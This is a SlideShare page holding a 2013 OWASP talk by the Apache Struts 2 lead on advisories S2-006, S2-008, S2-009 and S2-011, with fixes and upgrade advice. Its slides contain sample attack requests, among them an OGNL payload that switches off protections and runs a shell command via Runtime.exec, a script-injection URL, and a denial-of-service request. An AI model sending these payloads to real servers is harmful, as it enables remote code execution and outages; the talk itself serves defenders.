SlideShare uma empresa Scribd logo

Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"

Pawel Krawczyk
Pawel Krawczyk

Presented by Łukasz Lenart on OWASP Kraków meeting in February 2013.

Tecnologia
1 de 24
Baixar para ler offline
“…  use  the  source  …”   Based  on  Apache  Struts  2  
¡  About  me   ¡  What  is  the  Apache  Struts  2   ¡  Hacking  the  framework   §  S2-­‐006  aka  Client  side  code  injection   §  S2-­‐008  aka  Remote  Command  Execution   §  S2-­‐009  aka  RCE  strikes  back   §  S2-­‐011  aka  DoS   §  Sx-­‐xxx  aka  vulnerability  or  not  
¡  Apache  Struts  2  Lead   ¡  Member  of  Apache  Software  Foundation   ¡  Creative  Software  Engineer  @  SoftwareMill   ¡  Blogger   ¡  IntelliJ  IDEA  addict  J   ¡  JetBrains  Development  Academy  Member   ¡  @lukaszlenart   ¡  Husband,  father  J  
¡  Struts  2  is  a  new  kid  on  the  block   §  No  single  line  shared  with  Struts  1   §  No  form  beans,  no  session-­‐scoped  actions   §  Pure  POJOs,  Interface  steering   §  Strongly  interceptor  oriented   §  Highly  extendable  –  lots  of  plugins   §  Designed  to  be  customizable   §  Powerful  OGNL  expression  language  
#ognl   %{…}   ${…}  
struts.xml   index.jsp   IndexAction.properties  
¡  When  Dynamic  Method  Invocation  is  enabled   action  name  is  generated  base  on  the   provided  request   ¡  Non-­‐existing  action  will  generate  an  error   page  with  injected  client  code   §  Issue  is  specific  to  Weblogic  server   ¡  http://struts.apache.org/2.x/docs/s2-­‐006.html  
¡  /HelloWorld.action?action%3Alogin!login %3AcantLogin%3Cscript%3Ealert %28window.location%29%3C%2Fscript%3E %3Dsome_value=Submit  
¡  Disable  DMI   §  <constant   name="struts.enable.DynamicMethodInvocation"   value="false"  />   ¡  Upgrade  to  Struts  2.2.3   ¡  Don’t  use  Weblogic  ;-­‐)  
¡  Conversion  error  is  evaluated  as  expression   ¡  Cookie  name  is  evaluated  as  expression   ¡  With  “!”  (bang)  you  can  access  any  public   method  of  action   §  Only  when  Dynamic  Method  Invocation  is  set  to   true,  is  set  to  true  by  default       ¡  http://struts.apache.org/2.x/docs/s2-­‐008.html    
¡  /hello.action?id='%2b(new  Object())%2b’   ¡  Cookie:   @java.lang.Runtime@getRuntime().exec()=1   ¡  /mywebapp/recover!getPassword.action  
¡  Disable  DMI   §  <constant   name="struts.enable.DynamicMethodInvocation"   value="false"  />   ¡  Review  your  action  public  methods   ¡  Use  Strict  DMI  –  list  of  allowed  methods   ¡  DMI  disabled  by  default  as  from  Struts  2.3.1   ¡  Upgrade  to  Struts  2.3.1!  
¡  An  arbitrary  code  can  be  executed  on  server   §  Encoded  value  of  parameter  is  parsed  as  an  OGNL   expression   ¡  http://struts.apache.org/2.x/docs/s2-­‐009.html  
¡  /action?foo= %28%23context[%22xwork.MethodAccessor.deny MethodExecution%22]%3D+new +java.lang.Boolean%28false %29,%20%23_memberAccess[%22allowStaticMeth odAccess%22]%3d+new+java.lang.Boolean%28true %29,%20@java.lang.Runtime@getRuntime %28%29.exec%28%27mkdir%20/tmp/PWNAGE %27%29%29%28meh%29&z[%28foo %29%28%27meh%27%29]=true  
¡  Stronger  pattern  for  parameter  names   §  OGNL  only  sets  value,  does  not  evaluate  it   ¡  Workaround   §  add  a  filter  to  filter  out  all  the  suspicious  looking   parameters/headers   ¡  Upgrade  to  Struts  2.3.1.2  
¡  Denial  of  Service   §  Long  request  parameter  name  is  evaluated  by   OGNL  and  consumes  significant  CPU  cycle   ¡  http://struts.apache.org/2.x/docs/s2-­‐011.html  
¡  POST  /home   veryveryveryevenveryveryveryveryveryveryv eryveryevenevenveryveryveryveryloooooooo ooooooongpramaterename=1   §  300  request   §  parameter  name  length  =  1000000  
¡  Add  parameter  name  length  limit   §  By  default  100  characters   §  User  can  change  the  limit     ¡  Workaround   §  add  a  filter  to  filter  out  all  the  parameters  longer   than  xxx   ¡  Upgrade  to  Struts  2.3.4.1  
¡  Struts  2  allows  nested  OGNL  expressions   §  #  {%{java.lang.System@out.println(“hello”)}}   §  Users  do  not  escape  data   ¡  Example  –  please  judge  
¡  Check  how  vulnerable  your  current  web   framework  is   ¡  Find  a  security  vulnerability,  try  to  inject   JavaScript   §  Report  back  to  the  project  team  
    This  is  the  end,  questions?   @lukaszlenart   lukaszlenart@apache.org  

Recomendados

Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security API
caswenson
 
The practice of web application penetration testing
The practice of web application penetration testingThe practice of web application penetration testing
The practice of web application penetration testing
_U2_
 
Browser testing with nightwatch.js - Drupal Europe
Browser testing with nightwatch.js - Drupal EuropeBrowser testing with nightwatch.js - Drupal Europe
Browser testing with nightwatch.js - Drupal Europe
Salvador Molina (Slv_)
 
Develop Maintainable Apps
Develop Maintainable AppsDevelop Maintainable Apps
Develop Maintainable Apps
Annyce Davis
 
JDBC Basics (In 20 Minutes Flat)
JDBC Basics (In 20 Minutes Flat)JDBC Basics (In 20 Minutes Flat)
JDBC Basics (In 20 Minutes Flat)
Craig Dickson
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Struts database access
Struts database accessStruts database access
Struts database access
Abass Ndiaye
 
Dan Webb Presentation
Dan Webb PresentationDan Webb Presentation
Dan Webb Presentation
RubyOnRails_dude
 

Recomendados

Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security API
caswenson
 
The practice of web application penetration testing
The practice of web application penetration testingThe practice of web application penetration testing
The practice of web application penetration testing
_U2_
 
Browser testing with nightwatch.js - Drupal Europe
Browser testing with nightwatch.js - Drupal EuropeBrowser testing with nightwatch.js - Drupal Europe
Browser testing with nightwatch.js - Drupal Europe
Salvador Molina (Slv_)
 
Develop Maintainable Apps
Develop Maintainable AppsDevelop Maintainable Apps
Develop Maintainable Apps
Annyce Davis
 
JDBC Basics (In 20 Minutes Flat)
JDBC Basics (In 20 Minutes Flat)JDBC Basics (In 20 Minutes Flat)
JDBC Basics (In 20 Minutes Flat)
Craig Dickson
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Struts database access
Struts database accessStruts database access
Struts database access
Abass Ndiaye
 
Dan Webb Presentation
Dan Webb PresentationDan Webb Presentation
Dan Webb Presentation
RubyOnRails_dude
 
Hunting for malicious modules in npm - NodeSummit
Hunting for malicious modules in npm - NodeSummitHunting for malicious modules in npm - NodeSummit
Hunting for malicious modules in npm - NodeSummit
Adam Baldwin
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
Siddharth Bezalwar
 
Tomcat连接池配置方法V2.1
Tomcat连接池配置方法V2.1Tomcat连接池配置方法V2.1
Tomcat连接池配置方法V2.1
Zianed Hou
 
node.js errors
node.js errorsnode.js errors
node.js errors
LearningTech
 
Web application Security
Web application SecurityWeb application Security
Web application Security
Lee C
 
Structured Testing Framework
Structured Testing FrameworkStructured Testing Framework
Structured Testing Framework
serzar
 
Grails vs XSS: Defending Grails against XSS attacks
Grails vs XSS: Defending Grails against XSS attacksGrails vs XSS: Defending Grails against XSS attacks
Grails vs XSS: Defending Grails against XSS attacks
theratpack
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
theratpack
 
Unit testing patterns for concurrent code
Unit testing patterns for concurrent codeUnit testing patterns for concurrent code
Unit testing patterns for concurrent code
Dror Helper
 
Thomas Fuchs Presentation
Thomas Fuchs PresentationThomas Fuchs Presentation
Thomas Fuchs Presentation
RubyOnRails_dude
 
Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2
Broto Santoso
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET Application
Iron Speed
 
Real Life Information Security
Real Life Information SecurityReal Life Information Security
Real Life Information Security
Pawel Krawczyk
 
RootedCON 2015 - Deep inside the Java framework Apache Struts
RootedCON 2015 - Deep inside the Java framework Apache StrutsRootedCON 2015 - Deep inside the Java framework Apache Struts
RootedCON 2015 - Deep inside the Java framework Apache Struts
testpurposes
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
Hostway|HOSTING
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
jasonjfrank
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
Amanda Rousseau
 
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
CSCJournals
 
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSSSETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
hogehuga
 
Passive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overviewPassive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overview
Luc De Heyn
 
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
Erik Vloothuis
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
Chris Gates
 

Mais conteúdo relacionado

Mais procurados

Mais procurados (10)

Hunting for malicious modules in npm - NodeSummit
Hunting for malicious modules in npm - NodeSummitHunting for malicious modules in npm - NodeSummit
Hunting for malicious modules in npm - NodeSummit
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
 
Tomcat连接池配置方法V2.1
Tomcat连接池配置方法V2.1Tomcat连接池配置方法V2.1
Tomcat连接池配置方法V2.1
 
node.js errors
node.js errorsnode.js errors
node.js errors
 
Web application Security
Web application SecurityWeb application Security
Web application Security
 
Structured Testing Framework
Structured Testing FrameworkStructured Testing Framework
Structured Testing Framework
 
Grails vs XSS: Defending Grails against XSS attacks
Grails vs XSS: Defending Grails against XSS attacksGrails vs XSS: Defending Grails against XSS attacks
Grails vs XSS: Defending Grails against XSS attacks
 
XSS Countermeasures in Grails
XSS Countermeasures in GrailsXSS Countermeasures in Grails
XSS Countermeasures in Grails
 
Unit testing patterns for concurrent code
Unit testing patterns for concurrent codeUnit testing patterns for concurrent code
Unit testing patterns for concurrent code
 
Thomas Fuchs Presentation
Thomas Fuchs PresentationThomas Fuchs Presentation
Thomas Fuchs Presentation
 

Destaque

.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
Amanda Rousseau
 
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
CSCJournals
 

Destaque (13)

Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2Maximizing your coaxial (cable tv) v2
Maximizing your coaxial (cable tv) v2
 
Securing Your .NET Application
Securing Your .NET ApplicationSecuring Your .NET Application
Securing Your .NET Application
 
Real Life Information Security
Real Life Information SecurityReal Life Information Security
Real Life Information Security
 
RootedCON 2015 - Deep inside the Java framework Apache Struts
RootedCON 2015 - Deep inside the Java framework Apache StrutsRootedCON 2015 - Deep inside the Java framework Apache Struts
RootedCON 2015 - Deep inside the Java framework Apache Struts
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
.Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017 .Net Hijacking to Defend PowerShell BSidesSF2017
.Net Hijacking to Defend PowerShell BSidesSF2017
 
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor NetworksQueue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
Queue Size Trade Off with Modulation in 802.15.4 for Wireless Sensor Networks
 
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSSSETTING METHOD IN CONSIDERATION OF THE PCI/DSS
SETTING METHOD IN CONSIDERATION OF THE PCI/DSS
 
Passive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overviewPassive infrastructure of FTTH networks: an overview
Passive infrastructure of FTTH networks: an overview
 
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1A very quick introduction to HFC, DOCSIS 3.0 and 3.1
A very quick introduction to HFC, DOCSIS 3.0 and 3.1
 
ColdFusion for Penetration Testers
ColdFusion for Penetration TestersColdFusion for Penetration Testers
ColdFusion for Penetration Testers
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 

Semelhante a Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"

How secure your web framework is?
How secure your web framework is?How secure your web framework is?
How secure your web framework is?
SoftwareMill
 
Strut2-Spring-Hibernate
Strut2-Spring-HibernateStrut2-Spring-Hibernate
Strut2-Spring-Hibernate
Jay Shah
 
Taming Deployment With Smart Frog
Taming Deployment With Smart FrogTaming Deployment With Smart Frog
Taming Deployment With Smart Frog
Steve Loughran
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
David Paluy
 
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
Fred Sauer
 

Semelhante a Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2" (20)

How secure your web framework is?
How secure your web framework is?How secure your web framework is?
How secure your web framework is?
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Strut2-Spring-Hibernate
Strut2-Spring-HibernateStrut2-Spring-Hibernate
Strut2-Spring-Hibernate
 
Java scipt
Java sciptJava scipt
Java scipt
 
Taming Deployment With Smart Frog
Taming Deployment With Smart FrogTaming Deployment With Smart Frog
Taming Deployment With Smart Frog
 
Introduction to Struts 2
Introduction to Struts 2Introduction to Struts 2
Introduction to Struts 2
 
Python (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network AutomationPython (Jinja2) Templates for Network Automation
Python (Jinja2) Templates for Network Automation
 
Struts 2 – Interceptors
Struts 2 – InterceptorsStruts 2 – Interceptors
Struts 2 – Interceptors
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
 
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
IE 8 et les standards du Web - Chris Wilson - Paris Web 2008
 
(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server Calls(Don't) Go Tracing Server Calls
(Don't) Go Tracing Server Calls
 
JSUG - Filthy Flex by Christoph Pickl
JSUG - Filthy Flex by Christoph PicklJSUG - Filthy Flex by Christoph Pickl
JSUG - Filthy Flex by Christoph Pickl
 
Struts2 notes
Struts2 notesStruts2 notes
Struts2 notes
 
Struts2-Spring=Hibernate
Struts2-Spring=HibernateStruts2-Spring=Hibernate
Struts2-Spring=Hibernate
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
SF JUG - GWT Can Help You Create Amazing Apps - 2009-10-13
 
What the Struts?
What the Struts?What the Struts?
What the Struts?
 
Building an App with jQuery and JAXER
Building an App with jQuery and JAXERBuilding an App with jQuery and JAXER
Building an App with jQuery and JAXER
 
Java script
Java scriptJava script
Java script
 

Mais de Pawel Krawczyk

Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
Dlaczego przejmować się bezpieczeństwem aplikacji (pol)Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
Pawel Krawczyk
 

Mais de Pawel Krawczyk (20)

Top DevOps Security Failures
Top DevOps Security FailuresTop DevOps Security Failures
Top DevOps Security Failures
 
Authenticity and usability
Authenticity and usabilityAuthenticity and usability
Authenticity and usability
 
Reading Geek Night 2019
Reading Geek Night 2019Reading Geek Night 2019
Reading Geek Night 2019
 
Effective DevSecOps
Effective DevSecOpsEffective DevSecOps
Effective DevSecOps
 
Unicode the hero or villain
Unicode the hero or villain Unicode the hero or villain
Unicode the hero or villain
 
Get rid of TLS certificates - using IPSec for large scale cloud protection
Get rid of TLS certificates - using IPSec for large scale cloud protectionGet rid of TLS certificates - using IPSec for large scale cloud protection
Get rid of TLS certificates - using IPSec for large scale cloud protection
 
Presentation from CyberGov.pl 2015
Presentation from CyberGov.pl 2015 Presentation from CyberGov.pl 2015
Presentation from CyberGov.pl 2015
 
Leszek Miś "Czy twoj WAF to potrafi"
Leszek Miś "Czy twoj WAF to potrafi"Leszek Miś "Czy twoj WAF to potrafi"
Leszek Miś "Czy twoj WAF to potrafi"
 
Paweł Krawczyk - Ekonomia bezpieczeństwa
Paweł Krawczyk - Ekonomia bezpieczeństwaPaweł Krawczyk - Ekonomia bezpieczeństwa
Paweł Krawczyk - Ekonomia bezpieczeństwa
 
Are electronic signature assumptions realistic
Are electronic signature assumptions realisticAre electronic signature assumptions realistic
Are electronic signature assumptions realistic
 
Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
Dlaczego przejmować się bezpieczeństwem aplikacji (pol)Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
Dlaczego przejmować się bezpieczeństwem aplikacji (pol)
 
Filtrowanie sieci - Panoptykon
Filtrowanie sieci - PanoptykonFiltrowanie sieci - Panoptykon
Filtrowanie sieci - Panoptykon
 
Pragmatic view on Electronic Signature directive 1999 93
Pragmatic view on Electronic Signature directive 1999 93Pragmatic view on Electronic Signature directive 1999 93
Pragmatic view on Electronic Signature directive 1999 93
 
Why care about application security
Why care about application securityWhy care about application security
Why care about application security
 
Source Code Scanners
Source Code ScannersSource Code Scanners
Source Code Scanners
 
Krawczyk Ekonomia Bezpieczenstwa 2
Krawczyk Ekonomia Bezpieczenstwa 2Krawczyk Ekonomia Bezpieczenstwa 2
Krawczyk Ekonomia Bezpieczenstwa 2
 
Audyt Wewnetrzny W Zakresie Bezpieczenstwa
Audyt Wewnetrzny W Zakresie BezpieczenstwaAudyt Wewnetrzny W Zakresie Bezpieczenstwa
Audyt Wewnetrzny W Zakresie Bezpieczenstwa
 
Kryptografia i mechanizmy bezpieczenstwa
Kryptografia i mechanizmy bezpieczenstwaKryptografia i mechanizmy bezpieczenstwa
Kryptografia i mechanizmy bezpieczenstwa
 
Zaufanie W Systemach Informatycznych
Zaufanie W Systemach InformatycznychZaufanie W Systemach Informatycznych
Zaufanie W Systemach Informatycznych
 
Europejskie Ramy Interoperacyjności 2.0
Europejskie Ramy Interoperacyjności 2.0Europejskie Ramy Interoperacyjności 2.0
Europejskie Ramy Interoperacyjności 2.0
 

Último

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 

Último (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

Łukasz Lenart "How secure your web framework is? Based on Apache Struts 2"

  • 1. “…  use  the  source  …”   Based  on  Apache  Struts  2  
  • 2. ¡  About  me   ¡  What  is  the  Apache  Struts  2   ¡  Hacking  the  framework   §  S2-­‐006  aka  Client  side  code  injection   §  S2-­‐008  aka  Remote  Command  Execution   §  S2-­‐009  aka  RCE  strikes  back   §  S2-­‐011  aka  DoS   §  Sx-­‐xxx  aka  vulnerability  or  not  
  • 3. ¡  Apache  Struts  2  Lead   ¡  Member  of  Apache  Software  Foundation   ¡  Creative  Software  Engineer  @  SoftwareMill   ¡  Blogger   ¡  IntelliJ  IDEA  addict  J   ¡  JetBrains  Development  Academy  Member   ¡  @lukaszlenart   ¡  Husband,  father  J  
  • 4. ¡  Struts  2  is  a  new  kid  on  the  block   §  No  single  line  shared  with  Struts  1   §  No  form  beans,  no  session-­‐scoped  actions   §  Pure  POJOs,  Interface  steering   §  Strongly  interceptor  oriented   §  Highly  extendable  –  lots  of  plugins   §  Designed  to  be  customizable   §  Powerful  OGNL  expression  language  
  • 5.
  • 6. #ognl   %{…}   ${…}  
  • 8.
  • 9.
  • 10. ¡  When  Dynamic  Method  Invocation  is  enabled   action  name  is  generated  base  on  the   provided  request   ¡  Non-­‐existing  action  will  generate  an  error   page  with  injected  client  code   §  Issue  is  specific  to  Weblogic  server   ¡  http://struts.apache.org/2.x/docs/s2-­‐006.html  
  • 11. ¡  /HelloWorld.action?action%3Alogin!login %3AcantLogin%3Cscript%3Ealert %28window.location%29%3C%2Fscript%3E %3Dsome_value=Submit  
  • 12. ¡  Disable  DMI   §  <constant   name="struts.enable.DynamicMethodInvocation"   value="false"  />   ¡  Upgrade  to  Struts  2.2.3   ¡  Don’t  use  Weblogic  ;-­‐)  
  • 13. ¡  Conversion  error  is  evaluated  as  expression   ¡  Cookie  name  is  evaluated  as  expression   ¡  With  “!”  (bang)  you  can  access  any  public   method  of  action   §  Only  when  Dynamic  Method  Invocation  is  set  to   true,  is  set  to  true  by  default       ¡  http://struts.apache.org/2.x/docs/s2-­‐008.html    
  • 14. ¡  /hello.action?id='%2b(new  Object())%2b’   ¡  Cookie:   @java.lang.Runtime@getRuntime().exec()=1   ¡  /mywebapp/recover!getPassword.action  
  • 15. ¡  Disable  DMI   §  <constant   name="struts.enable.DynamicMethodInvocation"   value="false"  />   ¡  Review  your  action  public  methods   ¡  Use  Strict  DMI  –  list  of  allowed  methods   ¡  DMI  disabled  by  default  as  from  Struts  2.3.1   ¡  Upgrade  to  Struts  2.3.1!  
  • 16. ¡  An  arbitrary  code  can  be  executed  on  server   §  Encoded  value  of  parameter  is  parsed  as  an  OGNL   expression   ¡  http://struts.apache.org/2.x/docs/s2-­‐009.html  
